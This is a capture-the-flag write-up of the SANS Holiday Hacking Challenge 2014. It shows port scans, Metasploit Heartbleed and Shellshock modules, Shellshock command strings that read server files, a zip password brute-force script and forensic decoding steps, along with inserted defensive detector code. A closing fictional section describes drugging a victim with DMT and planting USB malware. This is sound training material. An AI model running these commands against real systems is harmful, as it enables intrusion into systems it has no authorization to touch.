
Page 1: “A Christmas Hacking Carol” - blogs.sans.orgblogs.sans.org/pen-testing/files/2015/02/SANS-Holiday-Hacking... · SANS Holiday Hacking Challenge 2014 Table of Contents Executive

SANS Holiday Hacking Challenge 2014

“A Christmas Hacking Carol”

Report Created: Sunday, January 4, 2015

Suave Security Web: http://www.SuaveSecurity.com E-mail: [email protected] Office: +1 641-715-3900 ext. 556377#


Table of Contents

Executive Summary 1

Attack Narrative 2

The Ghost of Hacking Past 2

Task #1: Time to say hello to Eliza 2

Task #2: Surf the Internet together 3

The Ghost of Hacking Present 4

Task #1: Heartbleed 4

Task #2: Shellshock 5

The Ghost of Hacking Future 6

Task #1: Analyze hhusb.dd.bin 6

Task #2: Analyze LetterFromJackToChuck.doc 6

Task #3: Analyze hh2014-chat.pcapng 8

Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip 9

Task #5: Analyze Tiny_Tom_Crutches_Final.jpg 11

Conclusion 12

The Real Story 13


Written By: Joshua Tomkiel Copyright 2014 Page 1 of 17

Executive Summary

Suave Security took on the task of identifying what steps Scrooge went through in order to obtain 7 secret messages. We had Scrooge’s consent to investigate the following IP addresses:

173.255.233.59
23.239.15.124
    o (http://www.scrooge-and-marley.com) ports 80 / 443 only

Efforts were taken to provide as much detail as possible so that the steps could be easily repeated. Throughout the investigation we discovered evidence that led us to question a Mr. Bob Cratchit. The story he provided to us can be found in the “Real Story” section at the bottom of this report. We have yet to go to the authorities with this information.


Attack Narrative

The Ghost of Hacking Past

The Ghost of Hacking Past, Mr. Alan Turing, gave this hint to Scrooge:

“Before I depart, I’d like to introduce you to an old friend of mine. She’s at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”

Task #1: Time to say hello to Eliza

First, I ran a port scan to see what services were running:

root@kali:~# nmap 173.255.233.59 -A -T4 -p 1-65535

The high port, 31124, seems interesting; let’s see if I can get any banner information:

root@kali:~# nc 173.255.233.59 31124

Here is Eliza. She’s a chat bot that responds to keywords such as “turing”, “turing machine”, “secret”, and “enigma”. If you type “secret” or “enigma” 3 times, you’ll get the next tip. But the most interesting trigger of all was the “surf to” command. Time to dig deeper.


Task #2: Surf the Internet together

Eliza holds a secret. In order to discover it, I had to “surf the Internet with her.” I spun up a virtual Ubuntu server instance on Amazon’s EC2 free hosting tier, installed Apache and set up a test page. I then issued the following command to Eliza: “surf to http://54.68.208.14/index.html”

My basic website on Amazon EC2

I was also tailing the Apache access.log file at the same time:

tail -f /var/log/apache2/access.log

The following entry appeared in the log:

173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1" 200 283 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing""

Initially I thought that I could use her as a proxy, but I was overthinking it. After hours of attempting different ways to get her to actually go to a URL, I ultimately told her what she was asking for.

Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"
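The log entry above is worth a closer look because Eliza delivers her secret inside the User-Agent header, and that header itself contains double quotes, which trips up naive parsers of Apache's combined log format. The following Python parser is an added example, not code from the report or from the challenge: it matches the User-Agent field greedily up to the closing quote at end of line, so a quoted string inside the agent survives intact. The sample log lines it runs on are constructed (the Eliza hit as quoted above plus an invented browser hit from 198.51.100.7).

```python
import re
from typing import Optional

# Apache "combined" log format.  The final field (User-Agent) is matched
# greedily up to the closing quote at end of line, so an agent string that
# itself contains double quotes (as Eliza's does) is still captured whole.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" '
    r'"(?P<agent>.*)"$'
)


def parse_combined(line: str) -> Optional[dict]:
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def agents_for_client(lines, client_ip: str) -> list:
    """Distinct User-Agent strings a given client presented, in first-seen order."""
    seen = []
    for line in lines:
        rec = parse_combined(line)
        if rec and rec["client"] == client_ip and rec["agent"] not in seen:
            seen.append(rec["agent"])
    return seen


# Constructed sample: the Eliza hit quoted in the report plus an ordinary browser hit.
SAMPLE_LOG = [
    '173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1" 200 283 "-" '
    '"Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing""',
    '198.51.100.7 - - [28/Dec/2014:14:36:01 +0000] "GET /index.html HTTP/1.1" 200 283 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/34.0"',
]

if __name__ == "__main__":
    for ua in agents_for_client(SAMPLE_LOG, "173.255.233.59"):
        print(ua)
```

Pulling the agent field out per client is also the quickest way to notice a crawler or bot that announces itself with an unusual User-Agent, which is exactly how Eliza showed up here.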


The Ghost of Hacking Present

The Ghost of Hacking Present, Johnny Long, gave this hint to Scrooge:

“I've magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time.”

http://www.scrooge-and-marley.com is vulnerable to Shellshock and Heartbleed.

Task #1: Heartbleed

root@kali:~# use auxiliary/scanner/ssl/openssl_heartbleed

Data leaked (URL-encoded fragment):

0for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2ek

Website Secret #1: Hacking can be noble.
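To make the mechanics of this leak concrete, here is an added Python example (not part of the report and not the Metasploit module's code) of the check a network detector performs: a TLS heartbeat record whose declared payload_length, plus the 3-byte heartbeat header and the 16 bytes of padding RFC 6520 requires, exceeds the record length. A patched OpenSSL silently discards such a record; an unpatched one answers with that many bytes of process memory, which is where the URL-encoded form data above came from. The three records inspected are constructed fixtures, not captured traffic.

```python
import struct

TLS_HEARTBEAT = 0x18      # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16          # RFC 6520: at least 16 bytes of random padding


def inspect_record(record: bytes) -> dict:
    """Parse one TLS record and report whether it is an over-declared heartbeat.

    The heartbeat is malformed when payload_length + 3 (type + length field)
    + MIN_PADDING is larger than the enclosing TLS record, which is the
    condition RFC 6520 says a receiver must reject.
    """
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, vmaj, vmin, rec_len = struct.unpack("!BBBH", record[:5])
    body = record[5:5 + rec_len]
    info = {
        "content_type": ctype,
        "version": (vmaj, vmin),
        "record_length": rec_len,
        "heartbeat": ctype == TLS_HEARTBEAT,
        "malformed": False,
    }
    if ctype != TLS_HEARTBEAT:
        return info
    if len(body) < 3:
        info["malformed"] = True          # not even room for type + length
        return info
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    info["hb_type"] = hb_type
    info["payload_length"] = payload_len
    info["malformed"] = payload_len + 3 + MIN_PADDING > rec_len
    return info


def count_suspect_heartbeats(records) -> int:
    """How many of the given records a detector should flag."""
    return sum(1 for r in records if inspect_record(r)["malformed"])


# Constructed fixtures (not captured traffic): a well-formed heartbeat request
# carrying a 4-byte payload plus 16 bytes of padding, a request that declares
# 0x4000 payload bytes inside a 3-byte record, and an ordinary application
# data record that the check must ignore.
GOOD_HB = (bytes([TLS_HEARTBEAT, 0x03, 0x02]) + struct.pack("!H", 3 + 4 + 16)
           + bytes([HB_REQUEST]) + struct.pack("!H", 4) + b"ping" + b"\x00" * 16)
BAD_HB = (bytes([TLS_HEARTBEAT, 0x03, 0x02]) + struct.pack("!H", 3)
          + bytes([HB_REQUEST]) + struct.pack("!H", 0x4000))
APP_DATA = bytes([0x17, 0x03, 0x02]) + struct.pack("!H", 5) + b"hello"

if __name__ == "__main__":
    for name, rec in (("good", GOOD_HB), ("bad", BAD_HB), ("appdata", APP_DATA)):
        print(name, inspect_record(rec))
```

The same length comparison, applied to the response direction, tells you whether a server actually bled: a heartbeat response whose record length is far larger than the request's payload is the leak itself.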


Task #2: Shellshock

root@kali:~# use auxiliary/scanner/http/apache_mod_cgi_bash_env

This was challenging since only the ECHO and PWD commands received responses. I had to figure out, within ECHO, how to change directories, print the current directory, distinguish files from directories and, finally, read the contents of a file.

Read the secret file:
echo $(cd /; pwd; while read line; do echo $line; done <secret)

Show only directories:
echo $(cd /; pwd; for f in */; do echo "$f"; done)

Change directories and list the current directory:
echo $(cd ..; cd ..; cd ..; pwd; for f in *; do echo "$f"; done)

Website Secret #2: Use your skills for good.
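The module above works because the CGI handler copies request headers into environment variables (HTTP_USER_AGENT and so on) that an unpatched bash then parses as function definitions. As an added example, not from the report and not Metasploit's code, the Python below shows the corresponding server-side check a web log monitor or WAF would run: it splits a raw HTTP request into its headers and flags any value that carries the "() {" trigger. Both sample requests are constructed; the host www.example.com and the /cgi-bin/status path are placeholders, and the probe value is the canonical harmless echo test.

```python
import re

# The Shellshock trigger is an environment value that begins with a bash
# function definition "() {"; an unpatched bash executes whatever follows
# the closing brace.  Whitespace between the tokens is optional, so the
# pattern also catches "(){" and "( ) {".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def parse_headers(raw_request: str) -> dict:
    """Split the header section of a raw HTTP request into a dict.

    Header names are lowercased; the request line is skipped and parsing
    stops at the blank line that terminates the headers.
    """
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def shellshock_indicators(raw_request: str) -> list:
    """(header, value) pairs whose value carries the Shellshock trigger.

    Every header is checked, not just User-Agent, because the CGI
    interface exports all of them (as HTTP_*) into the script's environment.
    """
    return [(name, value)
            for name, value in parse_headers(raw_request).items()
            if SHELLSHOCK_RE.search(value)]


# Constructed requests; www.example.com and /cgi-bin/status are placeholders.
BENIGN_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "\r\n"
)
PROBE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: () { :;}; echo vulnerable\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, PROBE_REQUEST):
        print(shellshock_indicators(req) or "clean")
```

Matching on the trigger rather than on any particular command after it is deliberate: the commands vary from probe to probe, the "() {" prefix does not.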


The Ghost of Hacking Future

The Ghost of Hacking Future left Scrooge without any hints:

“It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. That hand bore a device the Ghoul proffered to Scrooge, a single USB thumb drive bearing untold secret horrors.”

Task #1: Analyze hhusb.dd.bin

I ran strings on the .bin file to see if there was anything that jumped out at me. After parsing through the entire printout, I attempted to mount the .bin file by changing the file extension to .iso. However, not all files were displayed:

Extracting the .bin file with 7-ZIP on a Windows VM showed everything I needed and more:

Task #2: Analyze LetterFromJackToChuck.doc


I transferred the extracted folder back to my Kali VM and ran strings on the Word document:

strings -16 LetterFromJackToChuck.doc | uniq

The secret appeared at the bottom of the file:

USB Secret #1: Your demise is a source of mirth.


Task #3: Analyze hh2014-chat.pcapng

I ran strings on the PCAPNG file and found a message followed by a Base64-encoded string:

"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it. We now have a very happy house. I so love you." VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==

Decoded via command line:

USB Secret #2: Your demise is a source of relief.

I also uploaded the file to http://pcapng.com/. This site was able to display the Base64-encoded string and highlighted an interesting URL:

The URL also sticks out when grepping for anything that starts with http, which will come in handy later…

strings -16 hh2014-chat.pcapng | uniq | grep http

Small sample of output:

Location: http://10.10.10.1:1780/InternetGatewayDevice.xml

Location: http://10.10.10.1/HNAP1/

Location: http://10.10.10.1/HNAP1/

Referer: http://chat.scrooge-and-marley.com/

Referer: http://chat.scrooge-and-marley.com/

Referer: http://chat.scrooge-and-marley.com/

https://code.google.com/p/f5-steganography/

Referer: http://chat.scrooge-and-marley.com/

Referer: http://chat.scrooge-and-marley.com/

Referer: http://chat.scrooge-and-marley.com/
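The two triage steps above, decoding a Base64 string spotted in the strings output and grepping that same output for URLs, generalize into one small carving routine. The Python below is an added example, not code from the report or from pcapng.com: it pulls every Base64 token that decodes to printable text, and every distinct URL, out of a binary blob. The blob is a constructed stand-in for the capture, containing the chat line and URLs quoted in this section between bytes of noise; the decode check is what separates a real encoded message from a random run of alphanumerics.

```python
import base64
import binascii
import re
import string

# Base64 tokens: a run of at least 16 alphabet characters, optional '=' padding.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
# URLs: scheme plus the characters RFC 3986 allows, stopping at the first byte outside them.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
PRINTABLE = set(string.printable.encode())


def decode_if_text(token: bytes):
    """Base64-decode a token; return the text only if the result is printable ASCII."""
    if len(token) % 4:                      # only padded, well-formed tokens are tried
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(b in PRINTABLE for b in raw):
        return raw.decode("ascii")
    return None


def carve_base64_text(blob: bytes) -> list:
    """Every Base64 token in the blob that decodes to printable text."""
    found = []
    for m in B64_RE.finditer(blob):
        text = decode_if_text(m.group(0))
        if text is not None:
            found.append(text)
    return found


def carve_urls(blob: bytes) -> list:
    """Distinct URLs in first-seen order, mirroring `strings | uniq | grep http`."""
    seen = []
    for m in URL_RE.finditer(blob):
        url = m.group(0).decode("ascii", "replace")
        if url not in seen:
            seen.append(url)
    return seen


# Constructed sample standing in for the packet capture: the chat line from the
# report embedded between binary noise, plus two URLs, one of which repeats.
SAMPLE = (
    b"\x0a\x0d\x00\x00PCAP\x00\x00"
    b"Referer: http://chat.scrooge-and-marley.com/\x00\x00"
    b'"I so love you." VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==\x00'
    b"Referer: http://chat.scrooge-and-marley.com/\x00"
    b"https://code.google.com/p/f5-steganography/\x00\xff\xfe"
)

if __name__ == "__main__":
    for text in carve_base64_text(SAMPLE):
        print("base64:", text)
    for url in carve_urls(SAMPLE):
        print("url:", url)
```

On a real pcapng you would read the file in binary and pass its bytes in; because the regexes run over raw bytes, the routine works the same on any blob, not only on captures.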


Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip

The zip file was password protected. I ran CeWL on scrooge-and-marley.com to create a wordlist, based on a tip by the Ghost of Hacking Past and a tweet:

Source: https://twitter.com/pentesttips/status/544869613662507008

cewl www.scrooge-and-marley.com -w scrooge-and-marley-wordlist.txt

I used the wordlist and the script below to brute force the zip file using John the Ripper (script adapted from http://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/). Code:

#!/bin/bash
# ZIP-JTR: feed john's rule-mangled wordlist to unzip until a password opens the archive
echo "ZIP-JTR Decrypt Script"
if [ $# -ne 2 ]; then
    echo "Usage: $0 <zipfile> <wordlist>"
    exit 1
fi
unzip -l "$1"
# Read one candidate per line so passwords containing spaces are tried intact
while IFS= read -r i; do
    echo -ne "\rtrying \"$i\" "
    if unzip -o -P "$i" "$1" >/dev/null 2>&1; then
        echo -e "\nArchive password is: \"$i\""
        break
    fi
done < <(john --wordlist="$2" --rules --stdout)

./zip-jtr.sh hh2014-chat.pcapng_Bed_Curtains.zip scrooge-and-marley-wordlist.txt

Archive password is: "shambolic"

Ran strings on the extracted image “Bed_Curtains.png”:


USB Secret #3: Your demise is a source of gain for others.


Task #5: Analyze Tiny_Tom_Crutches_Final.jpg

Inside the extracted .bin, there was a folder named [DELETED]. Inside that folder was an image named “Tiny_Tom_Crutches_Final.jpg”.

Using the F5 steganography tool found via the link in the PCAP file (https://code.google.com/p/f5-steganography/), I was able to extract the final USB Secret:

java -jar f5.jar x -e secret.txt Tiny_Tom_Crutches_Final.jpg

USB Secret #4: You can prevent much grief and cause much joy.

Hack for good, not evil or greed.


Conclusion

The challenges that Scrooge had to overcome in order to obtain the secret messages ranged from petty personal attacks (e.g., chats purposely left within a packet capture for him to find, stating how happy people are now that he’s dead) to downright dangerous, remotely accessible and publicly disclosed exploits which could severely damage his company and reputation if left unmitigated (Heartbleed and Shellshock). Yes, these, along with the rest of the challenges covered within this report, could have been introduced by three “spirits” as depicted in the “A Christmas Hacking Carol” story. However, I would like to propose an alternate scenario: a more realistic explanation of what actually occurred to Scrooge that Christmas Eve. Evidence has been discovered proving that Scrooge fell victim to an often-overlooked threat that is all too common today: the disgruntled employee, otherwise known as the "insider threat."


The Real Story

Bob Cratchit had worked alongside his wife, Lynn, under Scrooge’s unforgiving iron fist for many years. Although not directly mentioned in the “A Christmas Hacking Carol” story, Bob was merely an apprentice to Scrooge and eager to learn as much as he could about anything security related. Bob had a curious mind, and when he was not reading up on the latest exploits and industry news, he would be working in his home lab to develop his own 0-day exploits. Bob’s desk was in the back far corner behind his wife in the Secret Room connected to Scrooge’s Main Laboratory. Bob was fascinated by genealogy and had been known to brag about his relation to Dr. Alan Mathison Turing from time to time. One day, Bob asked Scrooge for professional training to further enhance his exploit development skills. Just like coal for the fire, training costs money and Scrooge wasn’t about to pay a penny! He would respond to any training requests with “Bah, Humbug! Just YouTube it!” Alas, Bob knew that YouTube was no match for the high quality, on-demand training that the SANS Institute could offer. Defeated and discouraged, Bob sulked back to his desk. He knew that without additional training, he could never hope to compete with the likes of Scrooge. Scrooge had made too many powerful connections during his years of exploit peddling for Bob to challenge him straight on. Let’s just say Scrooge knew some people who could make Bob “disappear”. If Bob were to surpass Scrooge, he would have to bring him down to his level. Bob devised a plan to do just that. He was going to affect Scrooge in such a way that would make him open to supporting professional growth and promote a more positive work environment, or he would bring down the company altogether. It was all going to go down tomorrow, on Christmas Eve.

Much like many unmarried lonely men in their 50’s, Scrooge sought comfort from a bottle during the holiday season. Bob knew this and used it to his advantage. He planned to spike Scrooge’s drink with a powerful hallucinogen called Dimethyltryptamine (DMT), which when taken orally has a 90 – 125 minute delay before the effects start kicking in (according to Wikipedia). Later that afternoon, while Scrooge was busy talking with his nephew, who stopped by the Main Laboratory unannounced, Bob capitalized on the moment to add the liquid DMT to Scrooge’s cup. No one was the wiser. After Scrooge dismissed his cheerful nephew, he went back to his desk and continued to drink. Phase 1 was now complete. The time was approaching 5:00pm and the business day was coming to a close. Bob placed his hand in his pocket, ensuring that he was still in possession of two small USB flash drives. One was going to be used to plant malware on Scrooge’s MacBook. The other was to be used to attack Scrooge on an emotional level during the final phase of his plan. Scrooge left his MacBook unattended and unlocked as he made some notes in his business ledger. Bob moved quickly into action. Quietly, he crouched down and slipped in a USB flash drive that contained custom malware he’d written specifically for this moment. Within a few seconds, the payload was executed and a backdoor was established to Bob’s C&C server. This was insurance, just in case things didn’t go as planned.


Exhibit A: A photo taken by Mrs. Cratchit the exact moment Bob Cratchit infected Scrooge’s MacBook with custom malware while his back was turned. This was posted on Twitter via Mrs. Cratchit’s account: #Brag #MyManProvides #MacsDontGetViruses

With Scrooge still distracted, Bob connected via SSH with Scrooge’s stored credentials to the production web server hosting scrooge-and-marley.com (23.239.15.124). Then he downgraded the installed versions of Bash and OpenSSL, making the server vulnerable to Shellshock and Heartbleed. He had already set up a separate server hosting an Eliza chat bot to pay homage to his distant cousin, Dr. Alan Mathison Turing. Phase 2 was complete.

Moving on to phase 3, Bob had to make Scrooge’s old exploit machine, Marley, look like it was back online. Bob located the dusty old server in the Server Room. He noticed that the Ethernet cable had been crimped by hand and a few of the copper wires were not pushed all the way into the RJ45 connector. “Cheap ol’ Scrooge. Couldn’t even spring for some inexpensive cables from monoprice.com,” Bob muttered to himself. He replaced the cable with a new one and saw the LED lights start flashing on the NIC. “Layer 1 of the OSI model is so often overlooked.” Bob had previously been granted SSH access to this server and had root privileges on this box. He quickly connected and customized the MOTD text to display a cryptic message for Scrooge when he logged in next time. All that was left was to play the waiting game. He knew Scrooge was going to run his weekly internal vulnerability scan shortly. Bob connected his laptop to one of the SPAN ports on the switch and proceeded to sniff the traffic with Wireshark. Patiently, he waited until he saw the SSH connection from Scrooge’s laptop IP to Marley’s server IP. An hour passed by, then it happened! There was the traffic he’d been waiting for! He gave it another 15 seconds, enough time for Scrooge to read the message, and then abruptly powered down Marley. Moments later, Scrooge’s footsteps could be heard as he ran towards the Server Room. Bob closed his laptop and slid behind one of the server racks. It was evident that the effects of the hallucinogen had started to take their toll on Scrooge. Scrooge stumbled approaching the Server Room. Bob witnessed Scrooge wobble in the doorway and prop himself up against the door, struggling to maintain his balance. Scrooge stared hard into the room, began to recoil in horror, waved his hands in the air, screamed and ran out the door towards his bedroom. “Well, that was weird,” Bob thought to himself. Most importantly, phase 3 was complete.

Phase 4 of the plan was perhaps the riskiest of all. Bob was going to actually interact with Scrooge. Bob laid out three outfits in the Back Office. Each was to present a different message and challenge to Scrooge. The plan went better than Bob could have ever imagined, infinitely better! Scrooge was out of his mind the entire time due to the hallucinogen. It took all Bob had to maintain composure and not burst out laughing as Scrooge believed every word he said. Bob introduced himself as “The Ghost of Hacking Past - Dr. Alan Turing”, “The Ghost of Hacking Present - Johnny Long”, and the “Ghost of Hacking Future”, which was really just a big Grim Reaper costume he had from last Halloween. Scrooge was a changed man after the experience, paying for training whenever it was requested! Scrooge went on to tell the story of what happened to him that night to anyone that would listen. Previously, only Mr. and Mrs. Cratchit knew the truth of what happened that night, and now you do too.

In closing, remember that there will always be new vulnerabilities with nicknames splashed across the headlines. However, I implore you not to forget about the threats that may already be inside your organization, simply waiting for the appropriate moment to strike.